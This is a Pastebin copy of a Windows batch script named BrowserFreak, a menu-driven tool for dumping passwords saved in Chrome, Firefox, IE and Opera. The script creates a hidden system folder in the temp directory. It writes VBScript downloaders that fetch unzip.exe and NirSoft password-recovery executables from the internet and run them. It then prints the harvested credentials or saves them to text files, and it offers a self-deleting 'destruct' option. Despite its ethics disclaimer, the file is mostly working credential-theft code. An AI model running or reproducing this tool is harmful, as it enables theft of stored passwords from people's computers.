Advertisement
krot

BrowserFreak.bat

Jan 1st, 2017
254
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.92 KB | None | 0 0
  1. @echo off
  2. GOTO EndComment
  3. Title: BrowserFreak
  4.  
  5. Description: An automated tool to dump the saved passwords from
  6. your web browser.
  7.  
  8. Author: Osanda Malith (@OsandaMalith)
  9.  
  10. Disclaimer: This tool is meant for ethical (legal) purposes only.
  11.  
  12. Notes: Please note this tool may contain errors, and
  13. is provided "as it is". There is no guarantee
  14. that it will work on your target server(s), as
  15. the code may have to be adapted.
  16. This is to avoid script kiddie abuse as well.
  17.  
  18. License:
  19. This program is free software: you can redistribute it and/or modify
  20. it under the terms of the GNU General Public License as published by
  21. the Free Software Foundation, either version 3 of the License, or
  22. (at your option) any later version.
  23.  
  24. This program is distributed in the hope that it will be useful,
  25. but WITHOUT ANY WARRANTY; without even the implied warranty of
  26. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  27. GNU General Public License for more details.
  28.  
  29. You should have received a copy of the GNU General Public License
  30. along with this program. If not, see <http://www.gnu.org/licenses/>.
  31. :EndComment
  32. title Browser Freak v1.1 Coded by Osanda Malith
  33. :menu
  34. taskkill /IM wscript.exe /F > nul 2>&1
  35. cls
  36. color 17
  37. echo 8""""8
  38. echo 8 8 eeeee eeeee e e e eeeee eeee eeeee
  39. echo 8eeee8ee 8 8 8 88 8 8 8 8 " 8 8 8
  40. echo 88 8 8eee8e 8 8 8e 8 8 8eeee 8eee 8eee8e
  41. echo 88 8 88 8 8 8 88 8 8 88 88 88 8
  42. echo 88eeeee8 88 8 8eee8 88ee8ee8 8ee88 88ee 88 8
  43. echo.
  44. echo 8""""
  45. echo 8 eeeee eeee eeeee e e
  46. echo 8eeee 8 8 8 8 8 8 8
  47. echo 88 8eee8e 8eee 8eee8 8eee8e
  48. echo 88 88 8 88 88 8 88 8
  49. echo 88 88 8 88ee 88 8 88 8
  50. echo[
  51. echo [+] Coded by Osanda Malith
  52. echo [+] Email: osanda [at] unseen.is
  53. echo [+] Follow @OsandaMalith
  54.  
  55. ::Test for temp directory::
  56. if exist %temp%\freak (goto options) else (goto makedir)
  57.  
  58. :::::::::::::::::::::::::::
  59. ::Making Directory temp::
  60. :makedir
  61. md %temp%\freak > nul
  62. attrib +S +H %temp%\freak
  63. ::Internet::
  64. :internet
  65. ECHO [!] Checking your internet connection, please wait...
  66. PING -n 1 www.google.com|find "Reply from " >NUL
  67. IF NOT ERRORLEVEL 1 goto download
  68. IF ERRORLEVEL 1 goto nointernet
  69. ::Downloading ZIP::
  70. :download
  71. echo [!] Loading Please wait...
  72. echo strFileURL = "http://stahlworks.com/dev/unzip.exe" > %temp%\freak\down.vbs
  73. echo strHDLocation = "%temp%\freak\unzip.exe" >> %temp%\freak\down.vbs
  74. echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\down.vbs
  75. echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\down.vbs
  76. echo objXMLHTTP.send() >> %temp%\freak\down.vbs
  77. echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\down.vbs
  78. echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\down.vbs
  79. echo objADOStream.Open >> %temp%\freak\down.vbs
  80. echo objADOStream.Type = 1 >> %temp%\freak\down.vbs
  81. echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\down.vbs
  82. echo objADOStream.Position = 0 >> %temp%\freak\down.vbs
  83. echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\down.vbs
  84. echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\down.vbs
  85. echo Set objFSO = Nothing >> %temp%\freak\down.vbs
  86. echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\down.vbs
  87. echo objADOStream.Close >> %temp%\freak\down.vbs
  88. echo Set objADOStream = Nothing >> %temp%\freak\down.vbs
  89. echo End if >> %temp%\freak\down.vbs
  90. echo Set objXMLHTTP = Nothing >> %temp%\freak\down.vbs
  91. call %temp%\freak\down.vbs
  92.  
  93. ::Downlaod Chrome::
  94.  
  95. echo strFileURL = "http://www.nirsoft.net/utils/chromepass.zip" > %temp%\freak\chrome.vbs
  96. echo strHDLocation = "%temp%\freak\chromepass.zip" >> %temp%\freak\chrome.vbs
  97. echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\chrome.vbs
  98. echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\chrome.vbs
  99. echo objXMLHTTP.send() >> %temp%\freak\chrome.vbs
  100. echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\chrome.vbs
  101. echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\chrome.vbs
  102. echo objADOStream.Open >> %temp%\freak\chrome.vbs
  103. echo objADOStream.Type = 1 >> %temp%\freak\chrome.vbs
  104. echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\chrome.vbs
  105. echo objADOStream.Position = 0 >> %temp%\freak\chrome.vbs
  106. echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\chrome.vbs
  107. echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\chrome.vbs
  108. echo Set objFSO = Nothing >> %temp%\freak\chrome.vbs
  109. echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\chrome.vbs
  110. echo objADOStream.Close >> %temp%\freak\chrome.vbs
  111. echo Set objADOStream = Nothing >> %temp%\freak\chrome.vbs
  112. echo End if >> %temp%\freak\chrome.vbs
  113. echo Set objXMLHTTP = Nothing >> %temp%\freak\chrome.vbs
  114. call %temp%\freak\chrome.vbs
  115.  
  116. ::Download Firefox::
  117. echo strFileURL = "http://www.nirsoft.net/utils/passwordfox.zip" > %temp%\freak\fire.vbs
  118. echo strHDLocation = "%temp%\freak\passwordfox.zip" >> %temp%\freak\fire.vbs
  119. echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\fire.vbs
  120. echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\fire.vbs
  121. echo objXMLHTTP.send() >> %temp%\freak\fire.vbs
  122. echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\fire.vbs
  123. echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\fire.vbs
  124. echo objADOStream.Open >> %temp%\freak\fire.vbs
  125. echo objADOStream.Type = 1 >> %temp%\freak\fire.vbs
  126. echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\fire.vbs
  127. echo objADOStream.Position = 0 >> %temp%\freak\fire.vbs
  128. echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\fire.vbs
  129. echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\fire.vbs
  130. echo Set objFSO = Nothing >> %temp%\freak\fire.vbs
  131. echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\fire.vbs
  132. echo objADOStream.Close >> %temp%\freak\fire.vbs
  133. echo Set objADOStream = Nothing >> %temp%\freak\fire.vbs
  134. echo End if >> %temp%\freak\fire.vbs
  135. echo Set objXMLHTTP = Nothing >> %temp%\freak\fire.vbs
  136. call %temp%\freak\fire.vbs
  137.  
  138. ::Download IE::
  139. echo strFileURL = "http://www.nirsoft.net/utils/iepv.zip" > %temp%\freak\ie.vbs
  140. echo strHDLocation = "%temp%\freak\iepv.zip" >> %temp%\freak\ie.vbs
  141. echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\ie.vbs
  142. echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\ie.vbs
  143. echo objXMLHTTP.send() >> %temp%\freak\ie.vbs
  144. echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\ie.vbs
  145. echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\ie.vbs
  146. echo objADOStream.Open >> %temp%\freak\ie.vbs
  147. echo objADOStream.Type = 1 >> %temp%\freak\ie.vbs
  148. echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\ie.vbs
  149. echo objADOStream.Position = 0 >> %temp%\freak\ie.vbs
  150. echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\ie.vbs
  151. echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\ie.vbs
  152. echo Set objFSO = Nothing >> %temp%\freak\ie.vbs
  153. echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\ie.vbs
  154. echo objADOStream.Close >> %temp%\freak\ie.vbs
  155. echo Set objADOStream = Nothing >> %temp%\freak\ie.vbs
  156. echo End if >> %temp%\freak\ie.vbs
  157. echo Set objXMLHTTP = Nothing >> %temp%\freak\ie.vbs
  158. call %temp%\freak\ie.vbs
  159.  
  160. ::Download Opera::
  161. echo strFileURL = "http://www.nirsoft.net/utils/operapassview.zip" > %temp%\freak\opera.vbs
  162. echo strHDLocation = "%temp%\freak\operapassview.zip" >> %temp%\freak\opera.vbs
  163. echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\opera.vbs
  164. echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\opera.vbs
  165. echo objXMLHTTP.send() >> %temp%\freak\opera.vbs
  166. echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\opera.vbs
  167. echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\opera.vbs
  168. echo objADOStream.Open >> %temp%\freak\opera.vbs
  169. echo objADOStream.Type = 1 >> %temp%\freak\opera.vbs
  170. echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\opera.vbs
  171. echo objADOStream.Position = 0 >> %temp%\freak\opera.vbs
  172. echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\opera.vbs
  173. echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\opera.vbs
  174. echo Set objFSO = Nothing >> %temp%\freak\opera.vbs
  175. echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\opera.vbs
  176. echo objADOStream.Close >> %temp%\freak\opera.vbs
  177. echo Set objADOStream = Nothing >> %temp%\freak\opera.vbs
  178. echo End if >> %temp%\freak\opera.vbs
  179. echo Set objXMLHTTP = Nothing >> %temp%\freak\opera.vbs
  180. call %temp%\freak\opera.vbs
  181.  
  182. ::Download All:
  183. echo strFileURL = "http://nirsoft.net/utils/webbrowserpassview.zip" > %temp%\freak\all.vbs
  184. echo strHDLocation = "%temp%\freak\webbrowserpassview.zip" >> %temp%\freak\all.vbs
  185. echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\all.vbs
  186. echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\all.vbs
  187. echo objXMLHTTP.send() >> %temp%\freak\all.vbs
  188. echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\all.vbs
  189. echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\all.vbs
  190. echo objADOStream.Open >> %temp%\freak\all.vbs
  191. echo objADOStream.Type = 1 >> %temp%\freak\all.vbs
  192. echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\all.vbs
  193. echo objADOStream.Position = 0 >> %temp%\freak\all.vbs
  194. echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\all.vbs
  195. echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\all.vbs
  196. echo Set objFSO = Nothing >> %temp%\freak\all.vbs
  197. echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\all.vbs
  198. echo objADOStream.Close >> %temp%\freak\all.vbs
  199. echo Set objADOStream = Nothing >> %temp%\freak\all.vbs
  200. echo End if >> %temp%\freak\all.vbs
  201. echo Set objXMLHTTP = Nothing >> %temp%\freak\all.vbs
  202. call %temp%\freak\all.vbs
  203.  
  204. echo[
  205. echo [*] Welcome to the Browser Dumper
  206.  
  207. ::Options::
  208. :options
  209. ver | find /i "version 6.2." > nul
  210. if %errorlevel%==0 set $VERSIONWINDOWS=Windows 8
  211. ver | find /i "version 6.1." > nul
  212. if %errorlevel%==0 set $VERSIONWINDOWS=Windows 7
  213. ver | find /i "version 6.0." > nul
  214. if %errorlevel%==0 set $VERSIONWINDOWS=Windows Vista
  215. ver | find /i "version 5.1." > nul
  216. if %errorlevel%==0 set $VERSIONWINDOWS=Windows XP
  217. ver | find /i "version 5.2." > nul
  218. if %errorlevel%==0 set $VERSIONWINDOWS=Windows 2003
  219. ver | find /i "Windows 2000" > nul
  220. if %errorlevel%==0 set $VERSIONWINDOWS=Windows 2000
  221. ver | find /i "Windows NT" > nul
  222. if %errorlevel%==0 set $VERSIONWINDOWS=Windows NT
  223. ver | find /i ">Windows ME" > nul
  224. if %errorlevel%==0 set $VERSIONWINDOWS=Windows ME
  225. ver | find /i "Windows 98" > nul
  226. if %errorlevel%==0 set $VERSIONWINDOWS=Windows 98
  227. ver | find /i "Windows 95" > nul
  228. if %errorlevel%==0 set $VERSIONWINDOWS=Windows 95
  229.  
  230. REM Identify bit
  231. IF NOT EXIST "%SYSTEMDRIVE%\Program Files (x86)" set $VERSIONBIT=32 bit
  232. IF EXIST "%SYSTEMDRIVE%\Program Files (x86)" set $VERSIONBIT=64 bit
  233.  
  234. REM Display result
  235. echo [~] You are Running %$VERSIONWINDOWS% %$VERSIONBIT%
  236. echo.
  237. ::Voice::
  238. echo StrText="Welcome to the Browser Freak. Coded by Osanda Malith" > %temp%\freak\spk.vbs
  239. echo StrText2 = "Please pick A option" >> %temp%\freak\spk.vbs
  240. echo set ObjVoice=CreateObject("SAPI.SpVoice") >> %temp%\freak\spk.vbs
  241. echo ObjVoice.Speak StrText >> %temp%\freak\spk.vbs
  242. echo ObjVoice.Speak StrText2 >> %temp%\freak\spk.vbs
  243. start %temp%\freak\spk.vbs
  244. echo [~] Choose a Option
  245. echo 1. Dump Chrome Passwords
  246. echo 2. Dump Firefox Passwords
  247. echo 3. Dump IE Passwords
  248. echo 4. Dump Opera Passwords
  249. echo 5. Dump all Passwords (including Safari)
  250. echo 6. Destruct all of this and exit
  251. echo 7. Exit normally
  252. set /p "opt=>"
  253. :l
  254. if %opt% == 1 goto chrome
  255. if %opt% == 2 goto firefox
  256. if %opt% == 3 goto IE
  257. if %opt% == 4 goto opera
  258. if %opt% == 5 goto all
  259. if %opt% == 6 goto kill
  260. if %opt% == 7 goto end
  261. if %opt% == "" goto l
  262. echo Enter a Choice >.< goto l
  263.  
  264. :chrome
  265. cls
  266. color 17
  267. ::Voice::
  268. taskkill /IM wscript.exe /F > nul 2>&1
  269. echo StrText="Welcome to the Chrome Password Dumper coded by Osanda Malith" > %temp%\freak\spk.vbs
  270. echo set ObjVoice=CreateObject("SAPI.SpVoice") >> %temp%\freak\spk.vbs
  271. echo ObjVoice.Speak StrText >> %temp%\freak\spk.vbs
  272. start %temp%\freak\spk.vbs
  273. ::code of chrome::
  274. echo 8""""8
  275. echo 8 " e e eeeee eeeee eeeeeee eeee
  276. echo 8e 8 8 8 8 8 88 8 8 8 8
  277. echo 88 8eee8 8eee8e 8 8 8e 8 8 8eee
  278. echo 88 e 88 8 88 8 8 8 88 8 8 88
  279. echo 88eee8 88 8 88 8 8eee8 88 8 8 88ee
  280.  
  281. echo 8""""8
  282. echo 8 8 e e eeeeeee eeeee eeee eeeee
  283. echo 8e 8 8 8 8 8 8 8 8 8 8 8
  284. echo 88 8 8e 8 8e 8 8 8eee8 8eee 8eee8e
  285. echo 88 8 88 8 88 8 8 88 88 88 8
  286. echo 88eee8 88ee8 88 8 8 88 88ee 88 8
  287. echo.
  288. echo [~] Welcome to the Chrome Password Dumper
  289. echo.
  290. call %temp%\freak\unzip.exe -o %temp%\freak\chromepass.zip -d %temp%\freak > nul 2>&1
  291. echo [!] Do you want to save the output to a text file(Y/n)
  292. set /p "chrome=>"
  293. if %chrome% == Y goto savechrome
  294. if %chrome% == y goto savechrome
  295. if %chrome% == N goto nosavechrome
  296. if %chrome% == n goto nosavechrome
  297.  
  298. :savechrome
  299. set /p chromefile=[+] Enter a File Name:
  300. start %temp%\freak\ChromePass.exe /stext %chromefile%.txt
  301. echo [+] Successfully saved to %cd%\%chromefile%.txt
  302. echo [+] Press Enter to go to the Main Menu
  303. pause > nul
  304. goto menu
  305.  
  306. :nosavechrome
  307. start %temp%\freak\ChromePass.exe /stext ch.txt
  308. timeout /t 2 /nobreak > nul
  309. echo [+] Press Enter to View all the Passwords
  310. pause > nul
  311. type ch.txt
  312. del /f /q ch.txt > nul
  313. echo [+] Press Enter to go to the Main Menu
  314. pause > nul
  315. goto menu
  316.  
  317. ::FireFox::
  318. :firefox
  319. cls
  320. color 17
  321. echo 8""""
  322. echo 8 e eeeee eeee eeee eeeee e e
  323. echo 8eeee 8 8 8 8 8 8 88 8 8
  324. echo 88 8e 8eee8e 8eee 8eee 8 8 eeeeee
  325. echo 88 88 88 8 88 88 8 8 88 8
  326. echo 88 88 88 8 88ee 88 8eee8 88 8
  327.  
  328. echo 8""""8
  329. echo 8 8 e e eeeeeee eeeee eeee eeeee
  330. echo 8e 8 8 8 8 8 8 8 8 8 8 8
  331. echo 88 8 8e 8 8e 8 8 8eee8 8eee 8eee8e
  332. echo 88 8 88 8 88 8 8 88 88 88 8
  333. echo 88eee8 88ee8 88 8 8 88 88ee 88 8
  334. ::Voice::
  335. taskkill /IM wscript.exe /F >> nul 2>&1
  336. echo StrText="Welcome to the Firefox Password Dumper coded by Osanda Malith" > %temp%\freak\spk.vbs
  337. echo set ObjVoice=CreateObject("SAPI.SpVoice") >> %temp%\freak\spk.vbs
  338. echo ObjVoice.Speak StrText >> %temp%\freak\spk.vbs
  339. start %temp%\freak\spk.vbs
  340. ::code::
  341. call %temp%\freak\unzip.exe -o %temp%\freak\passwordfox.zip -d %temp%\freak > nul 2>&1
  342. echo [~] Welcome to the Firefox Password Dumper
  343. echo.
  344. echo [!] Do you want to save the output to a text file(Y/n)
  345. set /p "firefox=>"
  346. if %firefox% == Y goto savefirefox
  347. if %firefox% == y goto savefirefox
  348. if %firefox% == N goto nosavefirefox
  349. if %firefox% == n goto nosavefirefox
  350.  
  351. :savefirefox
  352. set /p firefoxfile=[+] Enter a File Name:
  353. start %temp%\freak\PasswordFox.exe /stext %firefoxfile%.txt
  354. echo [+] Successfully saved to %cd%\%firefoxfile%.txt
  355. echo [+] Press Enter to go to the Main Menu
  356. pause > nul
  357. goto menu
  358.  
  359. :nosavefirefox
  360. start %temp%\freak\PasswordFox.exe /stext ff.txt
  361. timeout /t 2 /nobreak > nul
  362. echo [+] Press Enter to View all the Passwords
  363. pause > nul
  364. type ff.txt
  365. del /f /q ff.txt > nul
  366. echo [+] Press Enter to go to the Main Menu
  367. pause > nul
  368. goto menu
  369.  
  370.  
  371. ::IE::
  372. :ie
  373. cls
  374. color 17
  375. echo 8 8""""
  376. echo 8 8
  377. echo 8e 8eeee
  378. echo 88 88
  379. echo 88 88
  380. echo 88 88eee
  381.  
  382. echo 8""""8
  383. echo 8 8 e e eeeeeee eeeee eeee eeeee
  384. echo 8e 8 8 8 8 8 8 8 8 8 8 8
  385. echo 88 8 8e 8 8e 8 8 8eee8 8eee 8eee8e
  386. echo 88 8 88 8 88 8 8 88 88 88 8
  387. echo 88eee8 88ee8 88 8 8 88 88ee 88 8
  388. ::Voice::
  389. taskkill /IM wscript.exe /F > nul 2>&1
  390. echo StrText="Welcome to the Internet Explorer Password Dumper coded by Osanda Malith" > %temp%\freak\spk.vbs
  391. echo set ObjVoice=CreateObject("SAPI.SpVoice") >> %temp%\freak\spk.vbs
  392. echo ObjVoice.Speak StrText >> %temp%\freak\spk.vbs
  393. start %temp%\freak\spk.vbs
  394. ::code::
  395. call %temp%\freak\unzip.exe -o %temp%\freak\iepv.zip -d %temp%\freak > nul 2>&1
  396. echo [~] Welcome to the Internet Explorer Password Dumper
  397. echo.
  398. echo [!] Do you want to save the output to a text file(Y/n)
  399. set /p "ie=>"
  400. if %ie% == Y goto saveie
  401. if %ie% == y goto saveie
  402. if %ie% == N goto nosaveie
  403. if %ie% == n goto nosaveie
  404.  
  405. :saveie
  406. set /p iefile=[+] Enter a File Name:
  407. start %temp%\freak\iepv.exe /stext %iefile%.txt
  408. echo [+] Successfully saved to %cd%\%iefile%.txt
  409. echo [+] Press Enter to go to the Main Menu
  410. pause > nul
  411. goto menu
  412.  
  413. :nosaveie
  414. start %temp%\freak\iepv.exe /stext ie.txt
  415. timeout /t 2 /nobreak > nul
  416. echo [+] Press Enter to View all the Passwords
  417. pause > nul
  418. type ie.txt
  419. del /f /q ie.txt
  420. echo [+] Press Enter to go to the Main Menu
  421. pause > nul
  422. goto menu
  423.  
  424. ::code of Opera::
  425. :opera
  426. cls
  427. echo 8"""88
  428. echo 8 8 eeeee eeee eeeee eeeee
  429. echo 8 8 8 8 8 8 8 8 8
  430. echo 8 8 8eee8 8eee 8eee8e 8eee8
  431. echo 8 8 88 88 88 8 88 8
  432. echo 8eeee8 88 88ee 88 8 88 8
  433.  
  434.  
  435. echo 8""""8
  436. echo 8 8 e e eeeeeee eeeee eeee eeeee
  437. echo 8e 8 8 8 8 8 8 8 8 8 8 8
  438. echo 88 8 8e 8 8e 8 8 8eee8 8eee 8eee8e
  439. echo 88 8 88 8 88 8 8 88 88 88 8
  440. echo 88eee8 88ee8 88 8 8 88 88ee 88 8
  441. echo.
  442. ::Voice::
  443. taskkill /IM wscript.exe /F > nul 2>&1
  444. echo StrText="Welcome to the Opera Browser Password Dumper coded by Osanda Malith" > %temp%\freak\spk.vbs
  445. echo set ObjVoice=CreateObject("SAPI.SpVoice") >> %temp%\freak\spk.vbs
  446. echo ObjVoice.Speak StrText >> %temp%\freak\spk.vbs
  447. start %temp%\freak\spk.vbs
  448. echo [~] Welcome to the Opera Password Dumper
  449. echo.
  450. call %temp%\freak\unzip.exe -o %temp%\freak\operapassview.zip -d %temp%\freak > nul 2>&1
  451. echo [!] Do you want to save the output to a text file(Y/n)
  452. set /p "opera=>"
  453. if %opera% == Y goto saveopera
  454. if %opera% == y goto saveopera
  455. if %opera% == N goto nosaveopera
  456. if %opera% == n goto nosaveopera
  457.  
  458. :saveopera
  459.  
  460. set /p chromefile=[+] Enter a File Name:
  461. start %temp%\freak\OperaPassView.exe /stext %operafile%.txt
  462. echo [+] Successfully saved to %cd%\%operafile%.txt
  463. echo [+] Press Enter to go to the Main Menu
  464. pause > nul
  465. goto menu
  466.  
  467. :nosaveopera
  468. start %temp%\freak\OperaPassView.exe /stext op.txt
  469. timeout /t 2 /nobreak > nul
  470. echo [+] Press Enter to View all the Passwords
  471. pause > nul
  472. type op.txt
  473. del /f /q op.txt > nul
  474. echo [+] Press Enter to go to the Main Menu
  475. pause > nul
  476. goto menu
  477.  
  478. ::ALL Dumper::
  479. :all
  480. cls
  481. echo 8""""8
  482. echo 8 8 e e
  483. echo 8eeee8 8 8
  484. echo 88 8 8e 8e
  485. echo 88 8 88 88
  486. echo 88 8 88eee 88eee
  487.  
  488. echo 8""""8
  489. echo 8 8 e e eeeeeee eeeee eeee eeeee
  490. echo 8e 8 8 8 8 8 8 8 8 8 8 8
  491. echo 88 8 8e 8 8e 8 8 8eee8 8eee 8eee8e
  492. echo 88 8 88 8 88 8 8 88 88 88 8
  493. echo 88eee8 88ee8 88 8 8 88 88ee 88 8
  494. echo.
  495. echo [~] Welcome to the All Browser Password Dumper
  496. echo.
  497. ::Voice::
  498. taskkill /IM wscript.exe /F > nul 2>&1
  499. echo StrText="Welcome to the All Browser Password Dumper coded by Osanda Malith" > %temp%\freak\spk.vbs
  500. echo set ObjVoice=CreateObject("SAPI.SpVoice") >> %temp%\freak\spk.vbs
  501. echo ObjVoice.Speak StrText >> %temp%\freak\spk.vbs
  502. start %temp%\freak\spk.vbs
  503. call %temp%\freak\unzip.exe -o %temp%\freak\webbrowserpassview.zip -d %temp%\freak > nul 2>&1
  504. echo [!] Do you want to save the output to a text file(Y/n)
  505. set /p "all=>"
  506. if %all% == Y goto saveall
  507. if %all% == y goto saveall
  508. if %all% == N goto nosaveall
  509. if %all% == n goto nosaveall
  510.  
  511. :saveall
  512.  
  513. set /p allfile=[+] Enter a File Name:
  514. start %temp%\freak\WebBrowserPassview.exe /stext %allfile%.txt
  515. echo [+] Successfully saved to %cd%\%allfile%.txt
  516. echo [+] Press Enter to go to the Main Menu
  517. pause > nul
  518. goto menu
  519.  
  520. :nosaveall
  521. start %temp%\freak\WebBrowserPassview.exe /stext all.txt
  522. timeout /t 2 /nobreak > nul
  523. echo [+] Press Enter to View all the Passwords
  524. pause > nul
  525. type all.txt
  526. del /f /q all.txt > nul
  527. echo [+] Press Enter to go to the Main Menu
  528. pause > nul
  529. goto menu
  530.  
  531.  
  532. :kill
  533. echo Are you sure you want to do this(y/n)
  534. set /p "kill=>"
  535. if %kill% == y goto killdone
  536. if %kill% == Y goto killdone
  537. if %kill% == n goto options
  538. if %kill% == N goto options
  539.  
  540. :killdone
  541. echo @echo off >> kill.bat
  542. rem echo rd /q /s %temp%\freak >> kill.bat
  543. echo del /f /q %0 >> kill.bat
  544. echo del /f /q kill.bat >> kill.bat
  545. start kill.bat
  546. exit
  547.  
  548.  
  549. :end
  550. taskkill /IM WScript.exe /F > nul 2>&1
  551. exit
  552.  
  553. :nointernet
  554. echo [-] Sorry you have no Internet Access...
  555. taskkill /IM WScript.exe /F > nul 2>&1
  556. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement